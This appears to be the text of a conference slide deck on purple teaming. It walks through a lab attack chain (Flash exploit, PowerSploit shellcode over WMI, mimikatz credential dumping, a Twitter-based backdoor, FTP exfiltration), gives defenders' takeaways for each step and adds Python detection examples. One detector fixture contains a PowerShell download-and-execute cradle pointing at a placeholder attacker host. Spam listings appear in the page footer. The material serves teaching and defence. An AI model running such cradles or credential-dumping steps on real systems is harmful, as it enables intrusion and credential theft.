Purple View
The recent trend of using Attack and Defense Together
Not OUR idea - backed by many
@raffertylaura | @haydnjohnson
Quick who are we
Haydn Johnson
@haydnjohnson
OSCP
Offensive/Attack Interest
Enjoys presenting
Laura
@raffertylaura
MSc Computer Science (Security/Privacy)
Interested in both sides of security
Loooooves presenting
Contents
1. Basic Term Definition
2. Introduction to Red, Blue and Purple
3. Run through of an Attack
○ Gaining Access
○ Lateral Movement
○ Domain Admin
○ Maintaining Access
○ Data Exfiltration
4. For each attack:
○ Attacking View
○ Defenders View
○ Possible Purple Team exercises
Definitions
Exploit - The thing used to gain unauthorized access to a system
Payload - What is done after the access is gained (shell, command)
Metasploit - An open source exploit framework, modular
Meterpreter - an advanced, extensible payload that uses in-memory DLL injection
Shell - Gaining Terminal/CMD access remotely
https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/
http://www.metasploit.com/
Red Team - Penetration | Offensive
● Scans
● Exploits
● Logic abuse
● Access to things they shouldn’t
Blue Team - Block, Prevent, Detect | Defensive
● Logs
● Emails
● Events
● Triggers
● Networking
● More Logs
Red Team - Goals
● Model recent threats and trends
● Longer term
● Highlight Gaps in Security Controls, detection etc
● Escape and Evade for Persistence
Blue Team - Goals
● Detect Attack
● Respond and Recover
● Produce Actionable Intelligence
● Identify Gaps and investment needs
Purple Team - Offensive & Defensive
Working together to achieve the ultimate goal of making the organization more secure
● Exposes blue team to different threats & attacker mindset
● Test incident detection and response
● Allows red team to sharpen skills
● Policy and procedures tested
● Tuning of controls
Purple Team - Offensive & Defensive
Different types of Purple Teaming
● Red Team sitting with Network Defense team
● Adversary Simulation
● Traffic Generation
● cobaltstrike.com
● Wargaming
Requires total picture involving all areas of the organization
Purple Team - The difference
● Using Security Posture and Weaknesses to find what is most valuable
● Goal Oriented
● Review attack
● Test how teams use services and how they are managed
Purple Team - The difference
● Time to Domain Admin
● Time to Data/Objective
● Time to Respond
● Time to Recover
● Identify where there needs to be more investment
● Measure Impact
Done right, the blue team should come out with better monitoring and response plans.
Purple Team - The difference
● Set up a fake scenario - Assume Breach
● How will the attacker gain access?
● Why have they attacked, what do they want?
● How did they move through the network?
● If they exfiltrated data, how?
Do not turn off servers or block IP addresses; keep it realistic
Purple Team - Exercise
“In the beginning, it’s easy to challenge and exercise a network defense team. You will find that many network defenders do not have a lot of experience (actively) dealing with a sophisticated adversary.”
- Raphael Mudge
http://blog.cobaltstrike.com/2014/11/12/adversary-simulation-becomes-a-thing/
Purple Team - DEMO (step by step)
Our exercise
Purple Team - Demo Architecture
Domain: corp.test.com
Tools Used
Red Team:
● Kali Linux
● Metasploit
● Meterpreter
● PowerSploit
● Twittor
Blue Team:
● Wireshark
● Windows Event Logs
Setting up Windows GP
Gaining Access
Hacking Team Flash Exploit
Flash Exploits
● Flash plugins are vulnerable
○ You can embed a javascript/binary within a Flash file
○ ActionScript to define events to redirect to landing page
● Most exploit kit landing pages redirect to pages containing Flash exploits
○ Angler
○ Nuclear
○ Fiesta
● Installed by default on browser
● New vulnerabilities are identified on almost a weekly basis
Gaining Access
Flash 18.0.0.194
A: Flash Exploit from SecurityFocus
Hacking Team Flash Exploit: http://downloads.securityfocus.com/vulnerabilities/exploits/75568.rb
A: Start Flash Exploit from Kali
A: Redirect Victim
Client1 user navigates to a malicious site which redirects to the exploit
A: Client1 is exploited
A: A session is now established with Client1
We can now run Meterpreter
B: Wireshark: Landing Page and Redirect
B: Wireshark: Shell
B: What can you take away
Security Onion: implement it, it is free
It has Snort rules for Flash exploits (need to install)
Confirm if Flash is needed for business reasons
Keep Flash updated
2811962 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 SSL Cert (trojan.rules)
2811963 - ETPRO TROJAN APT HTTPBrowser dropped by CVE-2015-5119 CnC Beacon (trojan.rules)
https://www.security-database.com/detail.php?alert=CVE-2015-5119
https://security-onion-solutions.github.io/security-onion/
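As an added example (not from the slides or the authors' demo), the Python below applies the takeaway to proxy logs rather than a packet capture: for every Flash object downloaded from a domain that is not on a business allow list, it walks the referer chain back on the same client and flags chains that crossed a domain boundary through an HTTP redirect, which is the landing-page-and-redirect pattern the Wireshark slide shows. The log lines, the domains and the allow list are constructed for the example.

```python
"""Flag a page visit that is redirected to another domain which then serves a Flash (SWF) object.
Runs over constructed proxy-log lines; every domain here is a placeholder, not an indicator."""
import re
from urllib.parse import urlparse

# Constructed sample proxy log: time client status method url content-type referer ("-" = none)
SAMPLE_PROXY_LOG = """\
10:01:01 10.0.0.11 200 GET http://news.example/article.html text/html -
10:01:02 10.0.0.11 302 GET http://news.example/ad.php - http://news.example/article.html
10:01:02 10.0.0.11 200 GET http://landing.example.net/gate.php text/html http://news.example/ad.php
10:01:03 10.0.0.11 200 GET http://landing.example.net/flash.swf application/x-shockwave-flash http://landing.example.net/gate.php
10:05:00 10.0.0.12 200 GET http://intranet.corp.test.com/video.swf application/x-shockwave-flash http://intranet.corp.test.com/training.html
"""

SWF_TYPES = {"application/x-shockwave-flash", "application/vnd.adobe.flash.movie"}
ALLOWED_SWF_DOMAINS = {"intranet.corp.test.com"}   # constructed: domains with a business need for Flash

LINE_RE = re.compile(r"^(\S+) (\S+) (\d{3}) (\S+) (\S+) (\S+) (\S+)$")


def parse_proxy_log(text):
    """Parse the constructed seven-field proxy log into dicts; malformed lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        time, client, status, method, url, ctype, referer = m.groups()
        rows.append({"time": time, "client": client, "status": int(status), "method": method,
                     "url": url, "ctype": ctype, "referer": None if referer == "-" else referer})
    return rows


def _domain(url):
    return urlparse(url).hostname or ""


def find_swf_after_redirect(rows):
    """For each SWF served by a non-allow-listed domain, rebuild the referer chain on the same
    client and record whether a 3xx response moved the browser to a different domain."""
    by_client = {}
    for r in rows:
        by_client.setdefault(r["client"], []).append(r)
    alerts = []
    for r in rows:
        if r["ctype"] not in SWF_TYPES or _domain(r["url"]) in ALLOWED_SWF_DOMAINS:
            continue
        chain, seen, redirected, cur = [r["url"]], set(), False, r
        while cur["referer"] and cur["referer"] not in seen:
            seen.add(cur["referer"])
            prev = next((p for p in by_client[r["client"]] if p["url"] == cur["referer"]), None)
            if prev is None:
                break
            chain.append(prev["url"])
            if 300 <= prev["status"] < 400 and _domain(prev["url"]) != _domain(cur["url"]):
                redirected = True
            cur = prev
        alerts.append({"client": r["client"], "swf": r["url"], "chain": list(reversed(chain)),
                       "cross_domain_redirect": redirected})
    return alerts


if __name__ == "__main__":
    for alert in find_swf_after_redirect(parse_proxy_log(SAMPLE_PROXY_LOG)):
        print(alert)
```

The allow list is what turns the "is Flash needed for business reasons" question into a rule: every SWF from a domain outside it is at least worth a look, and a cross-domain redirect in front of it raises the priority.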
Purple Team - Exercise
● Blue team understands how attackers can gain initial access
● Flash exploits - ongoing issue
● Helps blue team to identify suspicious traffic and understand what is happening from the attacker perspective
● Red team sees how its attacks are visible to the blue team and thinks of ways to make them stealthier
Privilege Escalation
Not Shown
Privilege Escalation
● We are skipping privilege escalation from Domain User to Local Admin
Lateral Movement
PowerSploit
A: PowerSploit
Available on Github
Open Source
https://github.com/mattifestation/PowerSploit
A: PowerSploit
More than 1 script!
PowerShell Modules
PowerView
Part of PowerShell Empire
Very advanced
https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView
A: Lateral Movement
The same local Administrator account passwords on multiple computers.
by Sean Metcalf
https://adsecurity.org/?p=1684
A: Lateral Movement
Same Passwords for All Local Admins
A: Lateral Movement
PowerSploit
Remote PowerShell
Using Invoke-Shellcode.ps1
A: Base64 Encoding Payload
Removes issues with whitespace
The Hacker Playbook 1 (now 2)
http://thehackerplaybook.com/dashboard/
A: Hosting PowerSploit Invoke-Shellcode.ps1
PowerSploit code hosted on local Kali machine
A: Invoke-WmiMethod
Use PowerShell to connect remotely, create a new process and launch the IEX cradle.
Calls Windows Management Instrumentation (WMI) methods.
The Win32_Process WMI class allows creation of a process.
A: Execute Remote command
Execute command from Client1 to tell Client2 to download and execute shellcode
A: Client1 gives same password
Same password across multiple clients
A: Receive Shell
B: Wireshark traffic
TCP Handshake
Bind Requests
B: Client1 requests remote instance on Client2
B: Client2 eventually asks where Kali is
B: Client2 downloads Invoke-Shellcode.ps1
B: Client1 logs into Client2
B: PowerShell Process Created
B: PowerShell connects to Kali
Client2 reaches out to Kali on port 80
B: What can you take away
Event Correlation - based on event ID, source and destination for remote connections
Implement alerting based on Security Events together
SIEM can/SHOULD do this
Use LOG-MD - really great logging tool, especially for PowerShell
http://brakeingsecurity.com/2015-042-log_md-more-malware-archaeology-and-sifting-through-the-junk
http://malwarearchaeology.squarespace.com/log-md/
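As an added example, not code from the talk, the Python below implements the event correlation the takeaway asks for, following the blue-team slides in order: on one host, a network logon (Security event 4624 with logon type 3) is followed within a few minutes by a PowerShell process creation (4688) whose -EncodedCommand decodes to a download cradle, and that process then opens an outbound connection (5156, Windows Filtering Platform permitted a connection). The events are constructed with simplified field names, and the host in the decoded command is a placeholder.

```python
"""Correlate the Client1 -> Client2 chain from Windows Security events.

Chain: network logon (4624, logon type 3) -> PowerShell process creation (4688)
whose encoded command decodes to a download cradle -> outbound connection from
that process (5156). All events are constructed samples with simplified fields."""
import base64
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed plaintext of the encoded command an analyst would recover from a 4688 event.
# The host name is a placeholder, not a real address.
PLAINTEXT_CMD = ("IEX (New-Object Net.WebClient).DownloadString("
                 "'http://ATTACKER-HOST-PLACEHOLDER/Invoke-Shellcode.ps1')")
# PowerShell's -EncodedCommand carries base64 of the UTF-16LE command text.
ENCODED_CMD = base64.b64encode(PLAINTEXT_CMD.encode("utf-16le")).decode("ascii")

POWERSHELL = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    # Client1 (10.0.0.11) logs on to Client2 over the network with the shared local admin account
    {"time": "2015-10-01T02:10:05", "host": "Client2", "id": 4624, "logon_type": 3,
     "user": "Administrator", "src_ip": "10.0.0.11"},
    # PowerShell is started on Client2 with an encoded command
    {"time": "2015-10-01T02:10:07", "host": "Client2", "id": 4688, "process": POWERSHELL,
     "cmdline": "powershell.exe -NoP -W Hidden -EncodedCommand " + ENCODED_CMD},
    # that process reaches out to port 80 on an internal host ("Kali" in the demo)
    {"time": "2015-10-01T02:10:09", "host": "Client2", "id": 5156, "process": POWERSHELL,
     "dst_ip": "10.0.0.99", "dst_port": 80},
    # unrelated benign admin script on another host, with no preceding network logon
    {"time": "2015-10-01T09:30:00", "host": "Client3", "id": 4688, "process": POWERSHELL,
     "cmdline": "powershell.exe -File C:\\scripts\\backup.ps1"},
]

CRADLE_TOKENS = ("downloadstring", "downloadfile", "iex", "invoke-expression", "net.webclient")
WINDOW = timedelta(minutes=5)
ENC_RE = re.compile(r"-(?:encodedcommand|enc)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand / -enc argument, or None if absent or malformed."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def _ts(event):
    return datetime.fromisoformat(event["time"])


def correlate(events, window=WINDOW):
    """Per host: 4624/type 3 -> suspicious PowerShell 4688 within `window` -> 5156 from it."""
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        by_host[e["host"]].append(e)
    alerts = []
    for host, evs in by_host.items():
        for logon in (e for e in evs if e["id"] == 4624 and e.get("logon_type") == 3):
            t0 = _ts(logon)
            later = [e for e in evs if t0 <= _ts(e) <= t0 + window]
            for proc in (e for e in later
                         if e["id"] == 4688 and e["process"].lower().endswith("powershell.exe")):
                decoded = decode_encoded_command(proc["cmdline"])
                # Inspect the decoded text when there is one, otherwise the raw command line.
                text = (decoded if decoded is not None else proc["cmdline"]).lower()
                if not any(tok in text for tok in CRADLE_TOKENS):
                    continue
                conns = [e for e in later if e["id"] == 5156
                         and e["process"] == proc["process"] and _ts(e) >= _ts(proc)]
                alerts.append({"host": host, "src_ip": logon["src_ip"], "user": logon["user"],
                               "decoded_command": decoded,
                               "outbound": [(c["dst_ip"], c["dst_port"]) for c in conns]})
    return alerts


if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

Two audit settings decide whether this rule has anything to work with: 4688 only carries the command line when "Include command line in process creation events" is enabled by policy, and 5156 only exists when Filtering Platform Connection auditing is on (Sysmon event 3 is the usual substitute). Without the decode step the base64 blob hides exactly the strings a keyword rule looks for.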
Purple Team - Benefits
● Identify ways to move around the network
● Identify and confirm Defensive Controls in Place
● Identify what worked, what did not
● Implement changes
● Justification for resources
Privilege Escalation
Local Admin to Domain Admin
A: Local Admin to Domain Admin
● Why escalate privileges from Local Admin to Domain Admin?
● Domain admin - control over Active Directory!
● Access IT resources
● Create accounts
● Propagate malware
A: Local Admin to Domain Admin
From Client1, map the admin$ share on Client2 and copy over sekurlsa.dll
A: Local Admin to Domain Admin
Use psexec to run mimikatz.exe on Client2
A: Local Admin to Domain Admin
Use sekurlsa::logonpasswords to dump the Domain Admin logon credentials from Client2!
B: Wireshark
B: Event Logs
Client1 logs into Client2 as local admin
B: Event Logs
Client1 runs mimikatz on Client2
B: Event Logs
Sensitive privilege use from Client1 to Client2
B: What can you take away
● Prevention:
○ Access control for shared drive
○ Limit access to psexec and monitor use
○ Active Directory best practices
● Detection:
○ IDS signatures
○ SIEM use case - Event correlation between system logs and network proxy logs
○ For lateral movement: enable file level auditing
○ Canary accounts
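As an added example, not the authors' code, the Python below turns three of the detection items above into rules over the event types the blue-team slides showed: access to the ADMIN$ share (5140) from a host that is not an approved admin workstation, the psexec-style follow-up on the same target (a new service installed, 7045 in the System log, and sensitive privilege use, 4673), and any authentication event naming a canary account. The event records, account names and the jump-host list are constructed; PSEXESVC is the default service name psexec installs.

```python
"""Detections for the privilege-escalation takeaways: ADMIN$ access from an unapproved
source with its psexec-style follow-up, and canary-account use.
Events are constructed samples with simplified field names."""
from collections import defaultdict
from datetime import datetime, timedelta

CANARY_ACCOUNTS = {"da_canary", "svc_backup_old"}   # constructed names nobody legitimately uses
ADMIN_JUMP_HOSTS = {"10.0.0.50"}                     # constructed: approved admin workstation IPs
WINDOW = timedelta(minutes=2)
LOGON_EVENT_IDS = {4624, 4625, 4768, 4771, 4776}     # logon, failed logon, TGT, pre-auth fail, NTLM

SAMPLE_EVENTS = [
    # Client1 (10.0.0.11) maps ADMIN$ on Client2
    {"time": "2015-10-01T03:00:01", "host": "Client2", "id": 5140,
     "share": r"\\*\ADMIN$", "src_ip": "10.0.0.11", "user": "Administrator"},
    # a service is installed on Client2 (PSEXESVC is psexec's default service name)
    {"time": "2015-10-01T03:00:20", "host": "Client2", "id": 7045,
     "service": "PSEXESVC", "image": r"%SystemRoot%\PSEXESVC.exe"},
    # sensitive privilege use by a process running as the local admin
    {"time": "2015-10-01T03:00:25", "host": "Client2", "id": 4673,
     "privilege": "SeDebugPrivilege", "process": r"C:\Windows\mimikatz.exe", "user": "Administrator"},
    # Kerberos TGT request for a canary account seen on the domain controller
    {"time": "2015-10-01T03:05:00", "host": "DC1", "id": 4768,
     "user": "da_canary", "src_ip": "10.0.0.12"},
    # legitimate helpdesk access from the approved jump host
    {"time": "2015-10-01T08:00:00", "host": "Client3", "id": 5140,
     "share": r"\\*\ADMIN$", "src_ip": "10.0.0.50", "user": "helpdesk.admin"},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def canary_hits(events):
    """Any authentication-related event naming a canary account is an alert on its own."""
    return [e for e in events
            if e["id"] in LOGON_EVENT_IDS and e.get("user", "").lower() in CANARY_ACCOUNTS]


def admin_share_chain(events, window=WINDOW):
    """ADMIN$ access from a non-approved source; severity is raised to high when a new
    service or sensitive privilege use follows on the same host within `window`."""
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        by_host[e["host"]].append(e)
    alerts = []
    for host, evs in by_host.items():
        for share in evs:
            if share["id"] != 5140 or not share["share"].upper().endswith("ADMIN$"):
                continue
            if share["src_ip"] in ADMIN_JUMP_HOSTS:
                continue
            t0 = _ts(share)
            follow = [e for e in evs if e["id"] in (7045, 4673) and t0 < _ts(e) <= t0 + window]
            alerts.append({"host": host, "src_ip": share["src_ip"], "user": share["user"],
                           "severity": "high" if follow else "medium",
                           "followed_by": [e["id"] for e in follow]})
    return alerts


if __name__ == "__main__":
    print(admin_share_chain(SAMPLE_EVENTS))
    print(canary_hits(SAMPLE_EVENTS))
```

The canary rule has no window or threshold on purpose: the accounts exist only to be touched, so a single event is the signal. The share rule depends on "Audit File Share" being enabled for 5140 and on the source list being kept current, which is itself a useful output of a purple exercise.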
Purple Team - Benefits
● Blue team observes vulnerabilities/threats which may not have been considered
○ Learns how an attacker could escalate privileges from local admin to domain admin
● Red team observes the footprint left behind by this attack and possibly how to minimize it
○ Can identify potential weaknesses in blue team monitoring/response processes
○ Provide more thorough recommendations
Twittor
Backdoor using Twitter
A: Twittor
● Easy to install
● Easy to use
● Easy to add shellcode
https://github.com/PaulSec/twittor
A: Twittor - insides
Simple subprocess execution
Stored as base64 encoded message
A: PyInstaller
On Github
Turns a Python file into an EXE
https://github.com/pyinstaller/pyinstaller
A: PyInstaller
Python file becomes Executable
Twittor: Backdoor Using Twitter
A: Twittor
Python file used as C2 server; Python file used as backdoor (EXE built with PyInstaller)
A: Twittor - Retrieving command
Send command to execute
Retrieve command
B: Twittor - Network Traffic
Reaching out to API
Normal user traffic??
B: Twittor - Client system
Backdoor as Python executable compiled with --no-console flag to hide output
B: Traffic from Client
Reaches out to Twitter
Src and destination are internal IPs; sends to API
B: What can you take away
Check if there are any remote connections after hours; is it against policy?
Again, correlate logs with known C2 addresses
See if AV picks it up
Purple Team - Benefits
Test if a C2 can reach out to Twitter.
Social media may be blocked via the browser, but some sites can still be accessed via API etc.
If it is not blocked, why not? Can your blue team help to stop this and others?
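As an added example, not from the talk, the Python below runs the two takeaways above over proxy logs: it reports any destination on a known-C2 list, and it counts, per client, requests to a social-media API host (the endpoint a browser-level block does not cover) that arrive outside business hours with no authenticated browser user, reporting a client once the pattern repeats. The log lines, the business hours and the indicator list are constructed; the C2 address is a TEST-NET placeholder.

```python
"""Hunt for the Twittor-style pattern over proxy logs: after-hours, unauthenticated calls to a
social-media API host, plus correlation against known C2 indicators.
Log lines are constructed; the C2 address is a TEST-NET placeholder, not a real indicator."""
from datetime import datetime, time
from urllib.parse import urlparse

BUSINESS_HOURS = (time(8, 0), time(18, 0))
SOCIAL_API_HOSTS = {"api.twitter.com"}   # API endpoints, as distinct from the site users browse
KNOWN_C2 = {"203.0.113.7"}               # constructed placeholder for a threat-feed entry

# Constructed proxy log: time client user method url status user-agent ("-" = no auth user)
SAMPLE_LOG = """\
2015-10-01T09:15:00 10.0.0.12 jsmith GET https://twitter.com/home 200 Mozilla/5.0
2015-10-01T22:41:03 10.0.0.12 - GET https://api.twitter.com/1.1/statuses/user_timeline.json 200 python-requests/2.7
2015-10-01T22:46:03 10.0.0.12 - POST https://api.twitter.com/1.1/direct_messages/new.json 200 python-requests/2.7
2015-10-01T23:10:00 10.0.0.14 - GET http://203.0.113.7/update 200 Mozilla/5.0
2015-10-01T13:00:00 10.0.0.15 akhan GET https://api.twitter.com/1.1/search/tweets.json 200 Mozilla/5.0
"""


def parse_proxy_log(text):
    """Split each constructed log line into its seven fields."""
    rows = []
    for line in text.splitlines():
        ts, client, user, method, url, status, ua = line.split(" ", 6)
        rows.append({"ts": datetime.fromisoformat(ts), "client": client,
                     "user": None if user == "-" else user, "method": method,
                     "url": url, "status": int(status), "ua": ua})
    return rows


def after_hours(ts, hours=BUSINESS_HOURS):
    """True when the timestamp falls outside the [start, end) business window."""
    return not (hours[0] <= ts.time() < hours[1])


def find_suspicious(rows, min_hits=2):
    """Known-C2 destinations are reported immediately; after-hours unauthenticated API calls
    are counted per client and reported once they repeat (a beacon, not a one-off)."""
    findings = []
    api_hits = {}
    for r in rows:
        host = urlparse(r["url"]).hostname or ""
        if host in KNOWN_C2:
            findings.append({"type": "known_c2", "client": r["client"], "url": r["url"]})
        if host in SOCIAL_API_HOSTS and r["user"] is None and after_hours(r["ts"]):
            api_hits[r["client"]] = api_hits.get(r["client"], 0) + 1
    for client, n in api_hits.items():
        if n >= min_hits:
            findings.append({"type": "after_hours_api", "client": client, "hits": n})
    return findings


if __name__ == "__main__":
    for finding in find_suspicious(parse_proxy_log(SAMPLE_LOG)):
        print(finding)
```

The daytime search-API call by an authenticated user is deliberately left alone; the point of the exercise is to separate the API traffic a backdoor generates from the social-media use a policy already tolerates, and the after-hours and no-user conditions are what do that here.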
Data Exfiltration
Clear Text FTP
A: Data Exfiltration Through Clear Text FTP
A: FTP Extraction
Finding data to extract
A: Finding data
Important data identified
A: Downloading data
A: Data Transferred
B: Meterpreter connection
DLL injection
Lots of chatter
B: FTP connection
Clear text
B: Successful Transfer
B: What can you take away?
Disable FTP - there should not really be a business need for it
If there is a business need, whitelist those IP addresses | Create a group of users specifically for FTP
Purple Team - Exercise
Clear Text
Will any alarms trigger?
Understand potential holes in alerting
Measure time to detect and respond
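As an added example, not the authors' code, the Python below covers both the takeaway and the exercise questions: it rebuilds FTP control-channel sessions from packet records (USER, PASS and STOR are readable because the protocol is clear text), alerts on uploads from a client or user outside the FTP allow lists, and computes time-to-detect from the first upload to the moment the alert was raised. The packet records, addresses and allow lists are constructed.

```python
"""Clear-text FTP detection: rebuild control-channel sessions, alert on uploads outside the
allow lists, and measure time-to-detect. Packet records are constructed, not a real capture."""
from datetime import datetime

FTP_ALLOWED_CLIENTS = {"10.0.0.40"}   # constructed: hosts with a business need for FTP
FTP_ALLOWED_USERS = {"ftp_batch"}     # constructed: the dedicated FTP user group

# Constructed control-channel packets: (time, src_ip, dst_ip, dst_port, payload)
SAMPLE_PACKETS = [
    ("2015-10-01T04:00:00", "10.0.0.12", "198.51.100.9", 21, "USER anonymous\r\n"),
    ("2015-10-01T04:00:01", "10.0.0.12", "198.51.100.9", 21, "PASS guest@\r\n"),
    ("2015-10-01T04:00:05", "10.0.0.12", "198.51.100.9", 21, "STOR customer_list.xlsx\r\n"),
    ("2015-10-01T04:00:30", "10.0.0.12", "198.51.100.9", 21, "STOR payroll_2015.csv\r\n"),
    ("2015-10-01T10:00:00", "10.0.0.40", "10.0.0.200", 21, "USER ftp_batch\r\n"),
    ("2015-10-01T10:00:01", "10.0.0.40", "10.0.0.200", 21, "PASS batch-password\r\n"),
    ("2015-10-01T10:00:02", "10.0.0.40", "10.0.0.200", 21, "STOR nightly_report.csv\r\n"),
]


def parse_ftp_sessions(packets):
    """Group packets to port 21 by (src, dst) and record USER, PASS and STOR commands."""
    sessions = {}
    for ts, src, dst, port, payload in packets:
        if port != 21:
            continue
        verb, _, arg = payload.strip().partition(" ")
        s = sessions.setdefault((src, dst), {"src": src, "dst": dst, "user": None,
                                             "credentials_exposed": False, "uploads": []})
        verb = verb.upper()
        if verb == "USER":
            s["user"] = arg
        elif verb == "PASS":
            s["credentials_exposed"] = True   # the password itself crossed the wire in clear text
        elif verb == "STOR":
            s["uploads"].append((ts, arg))
    return list(sessions.values())


def evaluate(sessions):
    """Alert on sessions that upload data from a client or user outside the allow lists."""
    alerts = []
    for s in sessions:
        reasons = []
        if s["src"] not in FTP_ALLOWED_CLIENTS:
            reasons.append("client not on FTP allow list")
        if s["user"] not in FTP_ALLOWED_USERS:
            reasons.append("user not in FTP group")
        if reasons and s["uploads"]:
            alerts.append({**s, "reasons": reasons})
    return alerts


def time_to_detect(alert, detected_at):
    """Seconds between the first upload in the alerted session and when the alert was raised."""
    first_upload = datetime.fromisoformat(alert["uploads"][0][0])
    return (datetime.fromisoformat(detected_at) - first_upload).total_seconds()


if __name__ == "__main__":
    for alert in evaluate(parse_ftp_sessions(SAMPLE_PACKETS)):
        print(alert, "detected after", time_to_detect(alert, "2015-10-01T04:03:05"), "s")
```

Even the permitted session shows credentials_exposed, which is the argument for disabling FTP outright: the allow list limits who may use it, but it cannot stop anyone on the path from reading the password.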
Conclusion
Purple Teaming is Good
Purple Team - Reiteration
Provides more value than a Penetration Test
Should be implemented into a regular schedule
Helps train security personnel
Helps make sure your boxes are tuned
Limitations and Future Work
● So far we have limited detection tools to Windows Server event logs and Wireshark (and a bit of Snort)
● Could be extended to enterprise security tools such as SIEM/IDS
● PowerShell/WMI for blue team
● More advanced attacks, persistence using PowerShell Empire
Obligatory Cute Kat Picture
References are in following slides
Microsoft - 8 minute Video
https://azure.microsoft.com/en-us/documentation/videos/red-vs-blue-internal-security-penetration-testing-of-microsoft-azure/
Seeing Purple: Hybrid Security Teams for the Enterprise - BSides Jackson 2013
http://www.slideshare.net/beltface/hybrid-talk
A: Downloads PowerShell file
Client2 reaches out to Kali machine

 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 

Último (20)

From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Boost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivityBoost PC performance: How more available memory can improve productivity
Boost PC performance: How more available memory can improve productivity
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen Frames
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
Mastering MySQL Database Architecture: Deep Dive into MySQL Shell and MySQL R...
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
